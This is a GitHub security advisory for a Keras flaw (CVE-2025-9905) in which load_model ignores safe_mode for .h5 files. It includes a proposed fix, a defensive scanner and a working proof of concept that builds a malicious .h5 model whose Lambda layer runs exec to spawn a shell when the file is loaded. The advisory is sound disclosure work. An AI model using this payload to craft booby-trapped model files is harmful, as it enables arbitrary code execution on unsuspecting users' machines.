# GHSA-36rr-ww3j-vrjv

Vulnerability from GitHub
Published: 2025-09-19 20:12
Modified: 2025-09-19 20:12

**Summary:** The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

**Details:**

**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.


## Summary

When a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique: `.h5` and `.hdf5` files are simply not checked for unsafe code execution.

From this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.

## Details

### Intended behaviour

According to the official Keras documentation, `safe_mode` is defined as:

> safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is, to some extent, **intentional**, as `safe_mode` is only applicable to `.keras` models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers, experts in binary or ML security, and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

### Technical Details

Examining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here's the relevant snippet:

```python
def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )
```

As shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.
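
For contrast, the flag does take effect for the native `.keras` format. Below is a minimal sketch, based on the documented v3 semantics (the exact exception type and message may vary across Keras versions), showing the same kind of Lambda-bearing model being refused under `safe_mode=True` when saved in the native format:

```python
import keras

# Minimal contrast sketch: a Lambda-bearing model saved in the native
# .keras format is expected to be refused under safe_mode=True.
model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(lambda x: x))
model.save("benign_lambda.keras")

try:
    keras.models.load_model("benign_lambda.keras", safe_mode=True)
except Exception as e:  # documented v3 behavior raises here for lambdas
    print("Refused under safe_mode=True:", e)
```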

### Solution

Since the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior, and to improve security in Keras, is to have `load_model` raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.
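
For illustration only, here is a minimal sketch of such a guard at the `.h5`/`.hdf5` branch of `load_model` shown above; the exception type and message are my own suggestion, not the actual patch:

```python
# Illustrative guard (not the actual Keras patch): refuse the legacy path
# unless the caller explicitly opts out of safe mode.
if str(filepath).endswith((".h5", ".hdf5")):
    if safe_mode:
        raise ValueError(
            "safe_mode is not supported for the legacy .h5/.hdf5 format; "
            "loading such a file can execute arbitrary code (e.g. via "
            "Lambda layers). Pass safe_mode=False only for trusted files, "
            "or convert the model to the native .keras format."
        )
    return legacy_h5_format.load_model_from_hdf5(
        filepath, custom_objects=custom_objects, compile=compile
    )
```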

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.

## PoC

From the attacker’s perspective, creating a malicious `.h5` model is as simple as the following:

```python
import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")
```

From the victim’s side, triggering code execution is just as simple:

```python
import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)
```

That’s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate or influence the attack in any way.

As expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.
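
On affected versions, a defender can apply a stopgap check before loading: read the architecture JSON that the legacy format stores and refuse files declaring `Lambda` layers, without deserializing anything. A minimal sketch, assuming the legacy convention of a root-level `model_config` HDF5 attribute and the Sequential/Functional config layout (file name taken from the PoC):

```python
import json

import h5py

# Stopgap for affected Keras versions: inspect the stored architecture
# without loading (and thus without executing) anything.
with h5py.File("./provola.h5", "r") as f:
    raw = f.attrs["model_config"]  # JSON string (bytes on some versions)

config = json.loads(raw)
layers = config["config"]["layers"]  # Sequential/Functional config layout
if any(layer["class_name"] == "Lambda" for layer in layers):
    raise RuntimeError("Refusing to load: model declares Lambda layers.")
print("No Lambda layers declared; still load only trusted files.")
```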

## Attack scenario

The attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model, *even with* `safe_mode=True`, which merely gives an illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

## Advisory metadata

- **ID:** GHSA-36rr-ww3j-vrjv
- **Affected package:** `keras` (PyPI); introduced in 3.0.0, fixed in 3.11.3
- **Aliases:** CVE-2025-9905
- **CWE:** CWE-913
- **Severity:** HIGH (CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SA:H)
- **Published / modified:** 2025-09-19T20:12:05Z
- **References:**
  - https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv
  - https://nvd.nist.gov/vuln/detail/CVE-2025-9905
  - https://github.com/keras-team/keras/pull/21602
  - https://github.com/keras-team/keras

